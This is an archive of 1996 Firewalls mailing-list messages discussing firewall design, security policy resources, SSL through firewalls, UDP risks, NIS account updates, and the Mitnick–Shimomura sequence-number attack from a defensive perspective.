Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA17296 for ; Thu, 11 Jan 1996 03:59:54 -0800 (PST)
Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.7.3/8.6.9) with SMTP id LAA20340 for ; Thu, 11 Jan 1996 11:59:15 GMT
Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id JAA06117 for ; Thu, 11 Jan 1996 09:42:00 GMT
From: Danny Cox
Date: Thu, 11 Jan 1996 09:40:54 GMT
Message-Id: <223.9601110940@gmap.leeds.ac.uk>
X-Planation: X-Faces images can be viewed with the XFaces program
To: firewalls@greatcircle.com
Subject: Re: Firewalls setup
X-Sun-Charset: US-ASCII
X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt

> To secure the internet connection, the mail and the dial out service
> we plan on using
> Firewall-1. The firewall will be located as follows:

etc.

In keeping with what I was asking recently, my understanding of Firewall-1 is that it is largely a router. Given this, are the CISCOs redundant in this design?

This isn't meant to be critical btw; it's an issue I'm concerned about ..

Thanks all,

Danny

From firewalls-owner Thu Jan 11 04:29:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA17089 for firewalls-outgoing; Thu, 11 Jan 1996 03:50:58 -0800 (PST)
Received: from uniwa.uwa.edu.au (uniwa.uwa.edu.au [130.95.128.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA17084 for ; Thu, 11 Jan 1996 03:50:48 -0800 (PST)
Received: from hedunx.hedland.edu.au ([223.254.252.2]) by uniwa.uwa.edu.au (8.6.11/8.6.9) with ESMTP id TAA22187; Thu, 11 Jan 1996 19:48:13 +0800
Received: from localhost (hartr@localhost) by hedunx.hedland.edu.au (8.6.4/8.6.4) id QAA16613; Thu, 11 Jan 1996 16:46:30 +0800
Date: Thu, 11 Jan 1996 16:46:29 +0800 (WST)
From: Robert Hart
Subject: Re: Internet Policy/Security Policy
To: Andrew Cameron
cc: firewalls@GreatCircle.COM
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jan 1996, Andrew Cameron wrote:
>
> I would like to know where I can find examples of an Internet/Security
> Policy for a company.
>
> I will need to write one in the near future and would like to draw on
> the experience of others.

Well, I have found the O'Reilly book "Building Internet Firewalls" chapter on this quite useful as I have been drafting up a policy for here...
---
Robert Hart                       hartr@hedunx.hedland.edu.au
Voice: +61 (0)91 72 0429          Fax: +61 (0)91 72 3560
Hedland College, PMB 1, South Hedland WA 6722 Australia

From firewalls-owner Thu Jan 11 04:59:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA18180 for firewalls-outgoing; Thu, 11 Jan 1996 04:48:13 -0800 (PST)
Received: from cbn.cbn.com.sg (cbn.cbn.com.sg [203.120.18.128]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA18175 for ; Thu, 11 Jan 1996 04:48:07 -0800 (PST)
Received: (from ngps@localhost) by cbn.cbn.com.sg (8.6.12/8.6.12) id UAA12946; Thu, 11 Jan 1996 20:41:13 +0800
Date: Thu, 11 Jan 1996 20:41:13 +0800 (SST)
From: Ng Pheng Siong
To: Brain21
cc: Frank Willoughby , firewalls@GreatCircle.COM, John Young
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jan 1996, Brain21 wrote:
> I would like to know this... if Shimomura is so good (and I actually
> believe that he may be) then why did he leave the r-utils enabled? Why
> did he not use TCPWrappers to prevent spoofing? Why did he allow people
> to see inside his network (Mitnick saw that there was a machine
> "X-something" that he believed was trusted by Shimomura's machine)?

Shimomura had almost complete packet traces of the break-in, which allowed him to reconstruct the attack.

It was a trap.

- PS
--
Ng Pheng Siong
NetCentre Pte Ltd * Singapore

Finger for PGP key.
From firewalls-owner Thu Jan 11 05:43:16 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA19035 for firewalls-outgoing; Thu, 11 Jan 1996 05:23:55 -0800 (PST)
Received: from nastg.gsfc.nasa.gov (nastg.gsfc.nasa.gov [192.86.21.220]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA19030; Thu, 11 Jan 1996 05:23:47 -0800 (PST)
Received: from maple.gsfc.nasa.gov by nastg.gsfc.nasa.gov (8.6.11/1.35) id IAA02782; Thu, 11 Jan 1996 08:31:01 -0500
Message-Id: <199601111331.IAA02782@nastg.gsfc.nasa.gov>
X-Sender: ddriesma@nastg
X-Mailer: Windows Eudora Version 1.4.3
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 Jan 1996 08:22:06 -0500
To: Firewalls@GreatCircle.COM, firewalls-digest@GreatCircle.COM
From: ddriesma@nastg.gsfc.nasa.gov (Debbie Driesman)
Subject: Re: Firewalls-Digest V5 #2
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Padgett,

Where can I get more information on PNS? I've tried a number of the web search tools and they didn't find anything.

Thanks,
Debbie

>Firewalls-Digest Tuesday, 2 January 1996 Volume 05 : Number 002
>
>From: "A. Padgett Peterson, P.E. Information Security"
>Date: Tue, 2 Jan 1996 14:02:49 -0500 (EST)
>Subject: Compression is useful - but for security, not
>
>>Being concerned about security, I did not want to present them a plan that
>>did not also include some security considerations. Some of the Government
>>people came up with the idea of using a compression box to reduce the number
>>of required T1s. The box they recommended has V.35 ports, and would sit
>>between the Cisco and the CSU/DSU. To be fair, the vendor told me his
>>box did not do encryption, but since the data was compressed, it would not
>>be in plain view.
>
>1) Compression aids performance. It does not aid security (at best is SBO).
>
>2) Sounds like you have dedicated lines. Have you considered requiring PNS
> (Protected Network Service) from the telco ?
> (May have a different name
> but should be available). With this your lines are isolated/protected
> from other trunks. A dedicated line is not at the same risk as the Internet
> and PNS is generally "good enough" for SBU (Sensitive but Unclassified)
> traffic.
>
> When the idea was introduced a couple of years ago, it was to be
> approved by the NSA and was a part of the FTS contract. Dunno where it
> is now.
> Warmly,
> Padgett

*****************************************************************************
Debbie Driesman, Computer Sciences Corp., 7700 Hubble Drive, Lanham, MD 20706
Phone: 301-794-2822, Fax: 301-794-9530
Email: ddriesma@nastg.gsfc.nasa.gov
*****************************************************************************

From firewalls-owner Thu Jan 11 06:03:47 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA18880 for firewalls-outgoing; Thu, 11 Jan 1996 05:19:15 -0800 (PST)
Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA18873 for ; Thu, 11 Jan 1996 05:19:10 -0800 (PST)
Received: from smiley.sit (smiley.mitre.org [128.29.140.20]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id IAA03621; Thu, 11 Jan 1996 08:18:13 -0500
Received: from [128.29.140.130] (mckenney-mac) by smiley.sit (4.1/SMI-4.1) id AA17824; Thu, 11 Jan 96 08:18:03 EST
Date: Thu, 11 Jan 96 08:18:02 EST
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: pf26376@ci.deere.com (Paul A. Fisher)
From: mckenney@smiley.mitre.org (Brian W. McKenney)
Subject: Re: Allow SSL through a firewall?
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Subject: Allow SSL through a firewall?
>
>I would like to allow access from the Internet to a WWW server that would
>have access to our corporate data. Because of the security implications,
>I would like that WWW server to be behind a firewall.
>I have tried to
>outline my design below and I would appreciate any comments about
>possible problems I may be opening myself up for.
>
>
>              ************               !
> client------* Internet *------Firewall---!---WWWserver
>              ************               !
>                                      Internal
>                                      Network
>
>The firewall would 'plug' (*not* proxy) port 443 inbound to the WWWserver.
>The WWWserver would run Netscape's Commerce server and use SSL to encrypt
>the entire session (non-SSL connections would be rejected). At that point
>we would have an encrypted session between the client and server that can
>pass whatever is necessary for the application (including userid's and
>passwords?).

The only problem that I see is that plug-gw must keep track of who is permitted to use the plug-gw proxy (via IP addresses). If you have a lot of consumers that must access your internal server then this could create a large net-perm table. Yes, you could set up a wildcard for multiple incoming connection hosts.

Also note that there are handshake connections (handshake protocol) between the client and the server prior to establishing an encrypted session. These packets are not encrypted.

Some would say that a screening router (say in a hybrid firewall) could perform a similar function. I would continue to run a stripped down SSL-based Web server.

Depending on your firewall, I would suggest that you look at the Netscape SSL proxy and compare both approaches. An SSL proxy has the chance of getting enhanced over time, I doubt that plug-gw will be enhanced in the future. Other firewall products also plan to support SSL proxies.

The strength of the encryption process also depends on what algorithms are employed between the client and server. Some would say that some exportable algorithms are not strong and could be broken.
Another attack mentioned in the SSLv3 spec is that an attacker may try to make the clients and servers fall back to SSLv2, then they could exploit SSLv2 weaknesses (this can only happen if both parties employ an SSLv2 handshake).

>
>The purpose of 'plugging' port 443 through the firewall is the WWWserver
>would be behind the firewall and thus not be subject to attack using other
>services (telnet, sendmail, etc.). The http server would have to be
>secured against outside attack, but not the entire machine. Also, this
>allows the applications running on the WWWserver to have access to all
>of the internal data servers without having to find their way through
>the firewall.
>
>There are still some questions that we need to answer from an application
>standpoint:
> Is SSL encryption 'strong' enough for our purposes?

This depends on what you want to protect. SSLv3 is much stronger than SSLv2. However, as with any protocol implementation, a new vulnerability may be discovered. The algorithms proposed in the SSLv3 spec (e.g., MD5, SHA, RSA) are commercial algorithms that are used in lots of commercial products. Netscape also plans to support FORTEZZA (NSA cryptography).

> Does the 'magic cookie' in the client present a problem?
>But from a network security standpoint, we shouldn't have a problem.
>
>Does anyone see any other problems with this proposed configuration?
>
>TIA,
>Paul
>
>Paul A. Fisher                paulf@ci.deere.com
>Deere & Company, W3LSW        ...uunet!deere!paulf
>John Deere Road               (309) 765-4547
>Moline, Illinois 61265        (309) 765-5242 FAX

From firewalls-owner Thu Jan 11 06:07:09 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA19260 for firewalls-outgoing; Thu, 11 Jan 1996 05:30:31 -0800 (PST)
Received: from wire.paladin.com (wire.paladin.com [198.69.226.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA19243 for ; Thu, 11 Jan 1996 05:30:23 -0800 (PST)
Received: (cjwoods@localhost) by wire.paladin.com (8.6.8/8.6.5) id IAA06393; Thu, 11 Jan 1996 08:24:32 -0500
Date: Thu, 11 Jan 1996 08:24:32 -0500 (EST)
From: Chris Woods
To: "Steven K. Sharp"
cc: Firewalls@GreatCircle.COM
Subject: Re: UDP and the unclean...
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 10 Jan 1996, Steven K. Sharp wrote:

> Please forgive me if this is a stupid question, but why is UDP such a bad
> thing? Especially things like RealAudio, this uses UDP to communicate (as
> do many other programs). What security risk does UDP pose?

As someone else detailed (more eloquently) earlier:

UDP is a connectionless protocol: i.e., it does not require an established session for packets to be sent to and fro. For lack of a simpler, easier explanation: the sender "spews" the packets without first establishing a connected session, while the intended (or unintended...) recipient takes the packets based on a few limited criteria (source address, destination address/port, etc).

RealAudio "randomizes" the UDP port that it tries to connect to within a range. That means that to accept RealAudio on your protected network, you must open a hole in your filter to allow UDP on a number of ports. Because of the way other UDP-based apps were written, this presents another vulnerability.
> I've seen that most people filter out all UDP first and then work from there
> with TCP. Would it be a gaping hole to allow it?

See above, hope it clears things up for you. The last explanation did for me...

Chris Woods                     cjwoods@paladin.com (office)
Systems Administrator           cjwoods@gigotech.net (home)
Paladin Computing Solutions     http://www.paladin.com
"A computer without Windows is like a fish without a bicycle."

From firewalls-owner Thu Jan 11 06:14:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA20665 for firewalls-outgoing; Thu, 11 Jan 1996 06:11:47 -0800 (PST)
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA20660 for ; Thu, 11 Jan 1996 06:11:43 -0800 (PST)
Date: Thu, 11 Jan 1996 9:10:47 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960111091047.20200f9e@hobbes.orl.mmc.com>
Subject: Sequence number attacks
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Steve rote:
>A couple of months ago, I did come up with a strong but simple defense
>against sequence number attacks. For details, see
>ftp://ds.internic.net/internet-drafts/draft-rfced-info-bellovin-00.txt

Is easy also to make the first line in your firewall ACL "Deny incoming ". Belt and suspenders are good 8*).

Warmly,
Padgett

From firewalls-owner Thu Jan 11 06:52:56 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA20553 for firewalls-outgoing; Thu, 11 Jan 1996 06:06:37 -0800 (PST)
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA20548 for ; Thu, 11 Jan 1996 06:06:33 -0800 (PST)
Date: Thu, 11 Jan 1996 9:05:36 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960111090536.20200f9e@hobbes.orl.mmc.com>
Subject: re: "Please reply to Email address and not to the list"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I would appreciate it if you can take a moment to respond to my email address
>(not the whole list) to "vote" on if you think SNMP traffic should pass through
>a Firewall.

Is hard to do if the E-mail address is not in the body of the message and your E-Mail system does not preserve headers. PLEASE, if you want a direct reply, end the message with a name and E-mail address.

Warmly,
Padgett

From firewalls-owner Thu Jan 11 06:59:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA21660 for firewalls-outgoing; Thu, 11 Jan 1996 06:44:10 -0800 (PST)
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA21650 for ; Thu, 11 Jan 1996 06:44:05 -0800 (PST)
Date: Thu, 11 Jan 1996 9:43:08 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960111094308.20200f9e@hobbes.orl.mmc.com>
Subject: PNS
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Where can I get more information on PNS? I've tried a number of the web
>search tools and they didn't find anything.

Is a telco service - not that many are on the web - call your local telephone office. Is unlikely that the first person you reach will know what Protected Network Services are but tell them it is a security feature and eventually you should get to the right person.
Warmly,
Padgett

From firewalls-owner Thu Jan 11 07:27:27 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20396 for firewalls-outgoing; Thu, 11 Jan 1996 05:59:42 -0800 (PST)
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20391 for ; Thu, 11 Jan 1996 05:59:37 -0800 (PST)
Date: Thu, 11 Jan 1996 8:58:40 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960111085840.20200f9e@hobbes.orl.mmc.com>
Subject: Re: Mitnik and helpers
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Frank rites:
>In defense of Shimomura (who isn't here
>to defend himself), I'll stick to what I've heard that it wasn't anything
>he had any choice over.

I have had trouble with this whole thing since the beginning. Security is not easy, is often inconvenient, but IMNSHO certain things go with the job.

I use this account not because it has all of the bells and whistles but because it is more secure than most other options (note: I did not say "perfectly secure"). My "secure" mail server is an old Zenith 386sx-16 with 2 Mb of RAM and a 40 Mb disk. All it knows how to do is to receive mail and it keeps a log of all transactions - is hard to erase a line when it was printed by a Panasonic 1090 - onna PC there is this cntrl-P command 8*).

When I send mail from this workstation (which cannot receive any itself), the reply address is either the mainframe or my local mail PC.

Over the years I have found too many interactions between systems after the fact that compromise security and simply find it easier to segregate tasks between machines and use a different (cheap) machine for each task. Not to say I don't like Suns, have a Sparc sitting next to me, just that a PC does so many things so easily and is what the users I support have.
Also what I have at home (an absurd number but mostly @ $25 each so what the heck).

However sensitive stuff on a UNIX box on a network that has "R" commands enabled ? With a new CERT vulnerability identified every month ? Give me a break.

Warmly,
Padgett

From firewalls-owner Thu Jan 11 07:29:05 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA21098 for firewalls-outgoing; Thu, 11 Jan 1996 06:26:38 -0800 (PST)
Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA21093 for ; Thu, 11 Jan 1996 06:26:34 -0800 (PST)
Received: by gauntlet-1.trusted.com; id JAA16404; Thu, 11 Jan 1996 09:29:19 -0500
Received: from vanidor.trusted.com(204.254.155.8) by gauntlet-1.trusted.com via smap (T3.1) id xmac16390; Thu, 11 Jan 96 09:28:53 -0500
Message-Id: <2.2.16.19960111142111.208fbaca@gauntlet-1.trusted.com>
X-Sender: avolio@gauntlet-1.trusted.com
X-Mailer: Windows Eudora Pro Version 2.2 (16)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 Jan 1996 09:21:11 -0500
To: HFDK41A@prodigy.com (MR. JOHN K MOLNAR), firewalls@GreatCircle.COM
From: Frederick M Avolio
Subject: Re: Mergent Gauntlet?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

TIS has about 50 or so resellers world-wide. Mergent is an authorized reseller and a bunch of extremely smart people.

You are correct. TIS owns the name "Gauntlet" and the Gauntlet Internet Firewall is ours. Anyone selling it should be an authorized reseller. If you are unsure, you can always drop a note to gauntlet-sales@tis.com.

Fred

At 02:05 PM 1/10/96 EST, MR. JOHN K MOLNAR wrote:
>Hi
>
>I got a fax this morning from Mergent, offering to sell me their
>Gauntlet Firewall???
>
>What's a Gauntlet if it's not from TIS?
>
>Or is this the same stuff??
>
>Confused.
>
>Thanks,
>
>-John Molnar
>
>

From firewalls-owner Thu Jan 11 07:30:48 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA21037 for firewalls-outgoing; Thu, 11 Jan 1996 06:24:24 -0800 (PST)
Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA21032 for ; Thu, 11 Jan 1996 06:24:20 -0800 (PST)
Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id GAA01166; Thu, 11 Jan 1996 06:21:23 -0800
Received: from disperse.demon.co.uk(158.152.1.77) by mycroft via smap (V1.3mjr) id sma001162; Thu Jan 11 06:20:43 1996
Received: from theboard.reednews.co.uk ([194.159.23.1]) by relay-2.mail.demon.net id aa12013; 11 Jan 96 14:21 GMT
Received: by reednews.co.uk (5.x/SMI-SVR4) id AA26523; Thu, 11 Jan 1996 14:23:00 GMT
From: Gavin Aiken
Message-Id: <9601111423.AA26523@reednews.co.uk>
Subject: Re: Sunos and NIS
To: Firewalls@greatcircle.com
Date: Thu, 11 Jan 1996 14:22:59 +0000 (GMT)
In-Reply-To: <199601110730.XAA06814@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 10, 96 11:30:28 pm
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I just want some help understanding something that happened here on Friday.
> I'm the sysadmin in a lab with 4 HP and 2 Suns. I have worked a lot
> with the HP, but almost never with the Suns, because there was
> another person that did it. This person left the lab, and now I
> have to learn about SunOS and BSD-like UNIX.
> There is a NIS server, let's call it "A", and there is a NIS client, let's
> call it "B". On Thursday I deleted a user from both systems, because
> we don't want him to access our net. On Friday I found that the "user"
> I deleted the day before accessed "B", and he has no login in the
> /etc/passwd; /etc/group, etc.
> I was looking with the last command at what happened, and I saw that
> the user accessed machine "B" plenty of times that day.
> I am really new to sysadmin labors on the Sun machines, I really know
> HP-UX. Maybe there is something I don't know is happening with the
> NIS service and something about the Yellow Pages service.
> I have to tell you that the person that was here before me just
> left the Suns like they were. I don't know what they did there,
> I am learning it right now.
> Thanks for helping me

Carolina,

Have you updated the NIS passwd map? If you update the /etc/passwd file, you still need to let NIS know that this has changed.

Under NIS+:

cd /etc; nisaddent -m -f hosts hosts

Under NIS/YP:

cd /var/yp; make

--
Gavin Aiken       | IT Dept, RRN Lancs      | http://www.reednews.co.uk
Newspaper House   | Work: +44 1254 678678
High Street       | Fax:  +44 1254 673347
Blackburn         | Home: +44 1254 812956
_________________________________________________________
*finger gavin@theboard.reednews.co.uk for PGP Public Key*

From firewalls-owner Thu Jan 11 07:32:30 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20136 for firewalls-outgoing; Thu, 11 Jan 1996 05:51:43 -0800 (PST)
Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20130 for ; Thu, 11 Jan 1996 05:51:39 -0800 (PST)
Received: from pm4-13.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA28877; Thu, 11 Jan 96 08:50:33 -0500
Date: Thu, 11 Jan 96 08:50:33 -0500
Message-Id: <9601111350.AA28877@su1.in.net>
X-Sender: frankw@in.net
X-Mailer: Windows Eudora Version 1.4.4
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Ng Pheng Siong
From: frankw@in.net (Frank Willoughby)
Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting)
Cc: firewalls@GreatCircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>From the desk of Ng Pheng Siong:
>On Wed, 10 Jan 1996, Brain21 wrote:
>> I would like to know this... if Shimomura is so good (and I actually
>> believe that he may be) then why did he leave the r-utils enabled? Why
>> did he not use TCPWrappers to prevent spoofing? Why did he allow people
>> to see inside his network (Mitnick saw that there was a machine
>> "X-something" that he believed was trusted by Shimomura's machine)?
>
>Shimomura had almost complete packet traces of the break-in, which
>allowed him to reconstruct the attack.
>
>It was a trap.
>
>
>- PS
>--
>Ng Pheng Siong
>NetCentre Pte Ltd * Singapore
>
>Finger for PGP key.

Not necessarily. I could easily imagine a dedicated Information Security Officer who was ordered to do something incredibly stupid (like trust external hosts on the internet, etc) doing a complete logging of all packets across that connection for the possible purposes of:

o detecting exploitations of the gaping security hole (including learning about new attacks you haven't previously thought of).

o provide evidence for possible prosecution (people frequently don't decide if they want to prosecute until after the incident has occurred - another unwise decision IMHO). Again, this is a by-product of the manager's decision to do something stupid, and not the intent of the vulnerability itself.

o background material for a "See, I told you this could happen and it did" if you are an individual who likes these kind of things (I don't).

Again, I'm willing to give Tsutomu the benefit of a doubt until more facts are presented.

Those who have been on the list for a month or two are gently reminded of my posting containing a brief story about a punker & a businessman which mentions this in greater detail. The mail was posted on 12/23/95 at 10:52am and had the subject of: "Re: FW-1 does not prevent session hijacking? Please support claim." The story is in the 2nd paragraph from the bottom of the mail.

Best Regards,

Frank

Fortified Networks Inc.
- Management & Information Security Consulting
Phone: (317) 573-0800 - http://www.fortified.com/fortified/
The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc.

From firewalls-owner Thu Jan 11 07:34:31 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA20243 for firewalls-outgoing; Thu, 11 Jan 1996 05:53:44 -0800 (PST)
Received: from magneto.bosch.com (magneto.bosch.com [198.111.120.52]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA20238 for ; Thu, 11 Jan 1996 05:53:39 -0800 (PST)
Received: by magneto.bosch.com; id IAA02701; Thu, 11 Jan 1996 08:47:47 -0500
Received: from cyber.rbus(192.168.2.2) by magneto via smap (V1.3) id sma002699; Thu Jan 11 08:47:23 1996
Received: by inet.rbus; id IAA08125; Thu, 11 Jan 1996 08:50:43 -0500
Received: from mail(172.16.1.21) by inet.rbus via smap (V1.3) id sma008123; Thu Jan 11 08:50:41 1996
Received: by mail.fh.rbus; id IAA04803; Thu, 11 Jan 1996 08:49:08 -0500
Date: Thu, 11 Jan 1996 08:49:08 -0500
Message-Id: <199601111349.IAA04803@mail.fh.rbus>
X-Sender: cwerner@fh.rbus
X-Mailer: Windows Eudora Pro Version 2.1.2
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@GreatCircle.com
From: "Christopher L. Werner"
Subject: Re: Internet Policy/Security Policy
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 10:11 PM 1/10/96 +0200, Andrew Cameron wrote:
>
>I would like to know where I can find examples of an Internet/Security
>Policy for a company.
>
>I will need to write one in the near future and would like to draw on
>the experience of others.

Ah, an old (but ever popular) question with a new subject title :-)

1) ftp://ftp.greatcircle.com has archives of this mailing list. If you download the July, August, September, and November 1995 files and grep for the following subject lines you'll get additional commentary on the various publications:

InfoSec policies made easy?
Policy Statement on Internet Usage
Internet security -organ
Internet access guidelines
Sample Security Policy?

2) There are web sites:

http://musie.phlab.missouri.edu/Policy/copies/tamu-collection1.html
http://gnn.interpath.net/gnn/meta/internet/forum/index.html
http://www.raptor.com (Internet Security Library)
http://ciac.llnl.gov/cstc/CIACHome.html
http://www.isse.gmu.edu:80/~gmuisi
http://hightop.nrl.navy.mil
http://csrc.ncsl.nist.gov
http://www.crpht.lu/CNS/html/PubServ/Security/documents.htm

3) There are books:

"Firewalls and Internet Security - repelling the wily hacker" by Cheswick and Bellovin, ISBN: 0-201-63357-4.
"Internet Firewalls and Network Security" by Siyan and Hare, ISBN: 1-56205-437-6
"Information Security Policies Made Easy" by Wood, ISBN: 1-881585-01-8
"Building Internet Firewalls" by Chapman and Zwicky, ISBN: 1-56592-124-0
(Forgot Title) by Cohen

4) There are Specs:

RFC-1244 Site Security Handbook

This should get you started....

(Hey - Brent/Marcus - shouldn't this be in the firewalls FAQ?)

--------------------------------------------------------------------
Opinions expressed are mine and not those of my employer.
--------------------------------------------------------------------
Christopher L. Werner          Robert Bosch Corporation
System Engineer                38000 Hills Tech Dr.
(810)553-1389                  Farmington Hills, MI 48331-3417

From firewalls-owner Thu Jan 11 07:37:18 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA22308 for firewalls-outgoing; Thu, 11 Jan 1996 07:08:23 -0800 (PST)
Received: from smtp1.interramp.com (smtp1.interramp.com [38.8.45.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA22303 for ; Thu, 11 Jan 1996 07:08:19 -0800 (PST)
Received: from [38.11.94.44] by smtp1.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) id KAA00276; Thu, 11 Jan 1996 10:06:49 -0500
X-Sender: cd000674@pop3.interramp.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 11 Jan 1996 12:00:28 +0900
To: Benjamin Allan Smith
From: dolphin@interramp.com (Tidewater Cyberfish)
Subject: None Secure Line
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>Brain21 wrote:
>
>>Hell, my father used
>>to do top secret work for the Dept. of Defense (he needed "Q" clearance,
>>and needs higher now) and the office where he worked communicated to its
>>other offices over the net. They used netcom. Not too terribly secure
>>if you ask me. They did not use encryption.

I'd be willing to bet a month's pay he didn't use that line to transmit classified or even SBU (sensitive but unclassified) information over that line.
rmck ____________________________ Bob McKisson Cypress Systems Corporation Chesapeake, VA 22320 (804) 436-1780 Voice/STU-III dolphin@interramp.com From firewalls-owner Thu Jan 11 07:40:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA20760 for firewalls-outgoing; Thu, 11 Jan 1996 06:15:23 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA20744 for ; Thu, 11 Jan 1996 06:15:09 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id IAA03580; Thu, 11 Jan 1996 08:14:12 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id IAA09100; Thu, 11 Jan 1996 08:14:09 -0600 Date: Thu, 11 Jan 1996 08:14:09 -0600 Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: brain21@montag33.residence.gatech.edu Cc: firewalls@greatcircle.com Message-Id: In-Reply-To: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brain21 wrote: >On Wed, 10 Jan 1996, Doug Hughes wrote: > >> 2) the spoofing attack had not become common knowledge and 